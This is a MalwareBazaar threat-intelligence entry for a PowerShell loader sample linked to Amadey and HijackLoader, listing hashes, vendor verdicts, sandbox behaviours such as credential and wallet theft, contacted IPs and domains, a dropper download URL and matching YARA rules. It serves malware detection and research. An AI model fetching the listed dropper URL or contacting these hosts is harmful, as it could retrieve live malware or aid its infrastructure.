MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 1e1fbd670fe9bf85942895e60c487d9eeb247acffd4c890ab75c1a5a50512998. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Amadey


Vendor detections: 13


Intelligence 13 IOCs YARA 24 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 1e1fbd670fe9bf85942895e60c487d9eeb247acffd4c890ab75c1a5a50512998
SHA3-384 hash: 2faf2512ab36ca4130b54d32d581b6646cf7a1df6874dcafb1320155bdf75659cd7f65f3c7f78439facc66214ade2d3c
SHA1 hash: 6e1542ac1a5ed4f320b00d2d0048df58befbbe19
MD5 hash: faa697a39f300b11ed0edfaa3bd25ac1
humanhash: april-item-fix-bulldog
File name:NTR.ps1
Download: download sample
Signature Amadey
Create hunting rule
File size:19'236'606 bytes
First seen:2025-10-13 20:34:07 UTC
Last seen:Never
File type:PowerShell (PS) ps1
MIME type:text/plain
ssdeep 49152:0GISdPTIf2yJ36FeCYPs7dWhToJ/p63hUbbuFmdbjKU63jJ9fZMTs3QMotWueM6m:J
Threatray 79 similar samples on MalwareBazaar
TLSH T1C8173310AFA9ADBF0668822CB0BF5F0E1BF10F94844DA2EB47E175C7128F7915917C69
Magika powershell
Reporter smica83
Tags:Amadey ps1

Intelligence

File Origin
# of uploads :
1
# of downloads :
133
Origin country :
HU HU
Vendor Threat Intelligence
Verdict:
Malicious
Score:
97.4%
Link:
https://cyber-fortress.com/docs/result/index.php?id=68ed626297a16d00a8d99f8d
Tags:
ransomware vmdetect spawn smtp
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
anti-vm base64 obfuscated stealer
Link:
https://www.filescan.io/uploads/68ed6267fe81c560ba582d5a/reports/14e0d208-1e3b-4cb5-b427-54660a121d26/overview
Verdict:
Malicious
Link:
https://www.hybrid-analysis.com/sample/1e1fbd670fe9bf85942895e60c487d9eeb247acffd4c890ab75c1a5a50512998
Verdict:
Unknown
File Type:
Link:
https://opentip.kaspersky.com/1e1fbd670fe9bf85942895e60c487d9eeb247acffd4c890ab75c1a5a50512998/results?tab=lookup
Result
Threat name:
HijackLoader
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1794384
Signature
AI detected malicious Powershell script
Allocates memory in foreign processes
Antivirus detection for dropped file
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for dropped file
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Powershell Download and Execute IEX
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
System process connects to network (likely due to code injection or exploit)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal from password manager
Writes to foreign memory regions
Yara detected HijackLoader
Yara detected Powershell download and execute
Yara detected Python Injector
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1794384 Sample: NTR.ps1 Startdate: 13/10/2025 Architecture: WINDOWS Score: 100 153 mi.limpingbronco.com 2->153 155 io.comecola.digital 2->155 157 6 other IPs or domains 2->157 187 Suricata IDS alerts for network traffic 2->187 189 Found malware configuration 2->189 191 Malicious sample detected (through community Yara rule) 2->191 193 14 other signatures 2->193 12 powershell.exe 83 2->12         started        15 cloRcNgGX9MeGdmu79FGtg.exe 2->15         started        18 cloRcNgGX9MeGdmu79FGtg.exe 2->18         started        20 3 other processes 2->20 signatures3 process4 dnsIp5 221 Suspicious powershell command line found 12->221 223 Found many strings related to Crypto-Wallets (likely being stolen) 12->223 225 Suspicious execution chain found 12->225 227 2 other signatures 12->227 23 Setup.exe 12 12->23         started        27 powershell.exe 20 12->27         started        29 powershell.exe 21 12->29         started        31 conhost.exe 12->31         started        145 C:\Users\user\AppData\Local\...\_isFB06.exe, PE32+ 15->145 dropped 33 _isFB06.exe 15->33         started        147 C:\Users\user\AppData\Local\...\_is26E9.exe, PE32+ 18->147 dropped 35 _is26E9.exe 18->35         started        159 127.0.0.1 unknown unknown 20->159 149 C:\Users\user\AppData\Local\...\_is67E9.exe, PE32+ 20->149 dropped 151 C:\Users\user\AppData\Local\...\_is4790.exe, PE32+ 20->151 dropped 37 _is4790.exe 20->37         started        39 _is67E9.exe 20->39         started        file6 signatures7 process8 file9 125 C:\Users\user\...\MicrosoftEdgeUpdate.exe, PE32 23->125 dropped 127 C:\Users\user\AppData\Local\...\A1CE3AC.tmp, PE32 23->127 dropped 129 C:\ProgramData\...\VCRUNTIME140.dll, PE32 23->129 dropped 131 4 other malicious files 23->131 dropped 195 Found hidden mapped module (file has been removed from disk) 23->195 197 Switches to a custom stack to bypass stack traces 23->197 199 Found direct / indirect Syscall (likely to bypass EDR) 23->199 41 MicrosoftEdgeUpdate.exe 23->41         started        201 Deletes itself after installation 27->201 45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        203 Multi AV Scanner detection for dropped file 33->203 49 cmd.exe 33->49         started        51 cmd.exe 35->51         started        53 cmd.exe 37->53         started        55 cmd.exe 39->55         started        signatures10 process11 dnsIp12 173 85.209.128.128, 49737, 49738, 80 VELIANET-ASvelianetInternetdiensteGmbHDE Netherlands 41->173 175 138.201.246.107, 443, 49725, 49726 HETZNER-ASDE Germany 41->175 205 Found many strings related to Crypto-Wallets (likely being stolen) 41->205 207 Bypasses PowerShell execution policy 41->207 209 Contains functionality to inject code into remote processes 41->209 211 8 other signatures 41->211 57 rundll32.exe 41->57         started        62 powershell.exe 41->62         started        64 powershell.exe 41->64         started        74 5 other processes 41->74 66 conhost.exe 49->66         started        68 conhost.exe 51->68         started        70 conhost.exe 53->70         started        72 conhost.exe 55->72         started        signatures13 process14 dnsIp15 177 mi.limpingbronco.com 172.67.168.12, 49742, 49743, 49745 CLOUDFLARENETUS United States 57->177 179 io.comecola.digital 172.67.209.123, 443, 49744, 49746 CLOUDFLARENETUS United States 57->179 133 C:\Users\user\...\socLbCJDVajuk3xLR7H6mPH.exe, PE32+ 57->133 dropped 135 C:\Users\user\...\cloRcNgGX9MeGdmu79FGtg.exe, PE32+ 57->135 dropped 137 C:\Users\user\...\socLbCJDVajuk3xLR7H6mPH[1], PE32+ 57->137 dropped 139 C:\Users\user\...\cloRcNgGX9MeGdmu79FGtg[1], PE32+ 57->139 dropped 213 System process connects to network (likely due to code injection or exploit) 57->213 215 Creates multiple autostart registry keys 57->215 76 cloRcNgGX9MeGdmu79FGtg.exe 57->76         started        80 socLbCJDVajuk3xLR7H6mPH.exe 57->80         started        217 Powershell uses Background Intelligent Transfer Service (BITS) 62->217 219 Loading BitLocker PowerShell Module 62->219 82 net.exe 62->82         started        84 conhost.exe 62->84         started        181 87.120.219.26, 49740, 49741, 80 NET1-ASBG Bulgaria 64->181 86 conhost.exe 64->86         started        88 WerFault.exe 74->88         started        90 WerFault.exe 74->90         started        92 WerFault.exe 74->92         started        94 3 other processes 74->94 file16 signatures17 process18 file19 141 C:\Users\user\AppData\Local\...\_isB6AA.exe, PE32+ 76->141 dropped 229 Multi AV Scanner detection for dropped file 76->229 96 _isB6AA.exe 76->96         started        143 C:\Users\user\AppData\Local\...\_isD781.exe, PE32+ 80->143 dropped 100 _isD781.exe 80->100         started        102 net1.exe 82->102         started        signatures20 process21 file22 109 C:\Users\user\AppData\...\vcruntime140.dll, PE32 96->109 dropped 111 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 96->111 dropped 113 C:\Users\user\AppData\Local\...\select.pyd, PE32 96->113 dropped 121 13 other malicious files 96->121 dropped 183 Multi AV Scanner detection for dropped file 96->183 185 Found pyInstaller with non standard icon 96->185 104 pythonw.exe 96->104         started        115 C:\Users\user\AppData\Local\...\Setup_UI.dll, PE32+ 100->115 dropped 117 C:\Users\user\AppData\...\vcruntime140.dll, PE32 100->117 dropped 119 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 100->119 dropped 123 13 other malicious files 100->123 dropped 107 pythonw.exe 100->107         started        signatures23 process24 dnsIp25 161 91.242.163.152, 1477, 49764, 49797 OOO-SYSMEDIA-ASRU Russian Federation 104->161 163 a8a00b7a27dd309f6.awsglobalaccelerator.com 3.33.196.84, 49759, 8545 AMAZONEXPANSIONGB United States 104->163 169 2 other IPs or domains 104->169 165 212.34.145.107, 30312, 49794 RAN-NETWORKSES Spain 107->165 167 91.212.166.19, 443, 49785 MOBILY-ASEtihadEtisalatCompanyMobilySA United Kingdom 107->167 171 2 other IPs or domains 107->171
Score:
79%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/1e1fbd670fe9bf85942895e60c487d9eeb247acffd4c890ab75c1a5a50512998
Verdict:
Malware
YARA:
3 match(es)
Tags:
Base64 Block CAB:COMPRESSION:MSZIP Contains Base64 Block DeObfuscated PowerShell
Link:
https://app.malva.re/file/faa697a39f300b11ed0edfaa3bd25ac1
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/1e1fbd670fe9bf85942895e60c487d9eeb247acffd4c890ab75c1a5a50512998/
Verdict:
Malicious
Threat:
Family.HIJACKLOADER
Link:
https://tip.neiki.dev/file/1e1fbd670fe9bf85942895e60c487d9eeb247acffd4c890ab75c1a5a50512998
Threat name:
Script-PowerShell.Trojan.Malgent
Create hunting rule
Status:
Malicious
First seen:
2025-10-12 22:57:07 UTC
File Type:
Text (PowerShell)
AV detection:
3 of 24 (12.50%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=dyp32zyp5g7ylfbisxtaysd5t3vsi6wp7vgiscvxlqnfuucrfgma._file
Verdict:
malicious
Label(s):
hijackloader
Create hunting rule
amadey
Create hunting rule
amaterastealer
Create hunting rule
Similar samples:
064073dcde901f6dc1e933bb5f531670b3506660bc154b197c5230a89489fb4e
Amadey
5c823f7f4bbe35f6e87b71112b22b97d7b7335dbc3a2c8630814f77d45062df2
Amadey
7fa4703339dc51fea48ed18a57ce81ed067050ed6f945e63f8f9032dd22522a9
Amadey
8d3634a77504cb0eee0f0f853bebaeb501a8147e104eb0f381a93b497272e34f
Amadey
ca9fe037cd08ae1d0e2129f290f7cd6062cecec907f87dd74a59226b77219e2d
Amadey
ccd0bc3f23955382d4a81c446cd7cb6ad7eaf12d1c450928b1849c082c43c483
Amadey
error
Amadey
f61471bf729deddf78cce549b739bb77509aa030ffbb161ba700f4c8fd943cbd
Amadey
f75bc578269b2286c78a711a0cc932ba6b57e1e2642b883847400c44c8bb57f5
Amadey
+ 69 additional samples on MalwareBazaar
Result
Malware family:
hijackloader
Create hunting rule
Score:
  10/10
Tags:
family:hijackloader discovery execution loader spyware stealer
Link:
https://tria.ge/reports/251013-zcrpsatqt4/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System Location Discovery: System Language Discovery
Suspicious use of SetThreadContext
Accesses cryptocurrency files/wallets, possible credential harvesting
Deletes itself
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Detects HijackLoader (aka IDAT Loader)
HijackLoader
Hijackloader family
Malware Config
Dropper Extraction:
http://87.120.219.26/mix2pgYCDbF4pdNYtz
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/1e1fbd670fe9bf85942895e60c487d9eeb247acffd4c890ab75c1a5a50512998

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:CP_Script_Inject_Detector
Create hunting rule
Author:DiegoAnalytics
Description:Detects attempts to inject code into another process across PE, ELF, Mach-O binaries
Rule name:DebuggerCheck__QueryInfo
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DetectEncryptedVariants
Create hunting rule
Author:Zinyth
Description:Detects 'encrypted' in ASCII, Unicode, base64, or hex-encoded
Rule name:detect_powershell
Create hunting rule
Author:daniyyell
Description:Detects suspicious PowerShell activity related to malware execution
Rule name:Detect_PowerShell_Obfuscation
Create hunting rule
Author:daniyyell
Description:Detects obfuscated PowerShell commands commonly used in malicious scripts.
Rule name:dgaagas
Create hunting rule
Author:Harshit
Description:Uses certutil.exe to download a file named test.txt
Rule name:FreddyBearDropper
Create hunting rule
Author:Dwarozh Hoshiar
Description:Freddy Bear Dropper is dropping a malware through base63 encoded powershell scrip.
Rule name:golang_bin_JCorn_CSC846
Create hunting rule
Author:Justin Cornwell
Description:CSC-846 Golang detection ruleset
Rule name:HeavensGate
Create hunting rule
Author:kevoreilly
Description:Heaven's Gate: Switch from 32-bit to 64-mode
Rule name:INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
Create hunting rule
Author:ditekSHen
Description:Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers
Rule name:malware_shellcode_hash
Create hunting rule
Author:JPCERT/CC Incident Response Group
Description:detect shellcode api hash value
Rule name:meth_stackstrings
Create hunting rule
Author:Willi Ballenthin
Rule name:RANSOMWARE
Create hunting rule
Author:ToroGuitar
Rule name:shellcode
Create hunting rule
Author:nex
Description:Matched shellcode byte patterns
Rule name:Sus_CMD_Powershell_Usage
Create hunting rule
Author:XiAnzheng
Description:May Contain(Obfuscated or no) Powershell or CMD Command that can be abused by threat actor(can create FP)
Rule name:ThreadControl__Context
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:vmdetect
Create hunting rule
Author:nex
Description:Possibly employs anti-virtualization techniques
Rule name:Warp
Create hunting rule
Author:Seth Hardy
Description:Warp
Rule name:WarpStrings
Create hunting rule
Author:Seth Hardy
Description:Warp Identifying Strings
Rule name:Windows_Exploit_Generic_008359cf
Create hunting rule
Author:Elastic Security
Rule name:Windows_Trojan_ACRStealer_f9728d76
Create hunting rule
Author:Elastic Security
Rule name:WIN_FileFix_Detection
Create hunting rule
Author:dogsafetyforeverone
Description:Detects FileFix social engineering technique that launches chained PowerShell and PHP commands from file explorer typed paths
Reference:FileFix social engineering with PowerShell and PHP commands

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Comments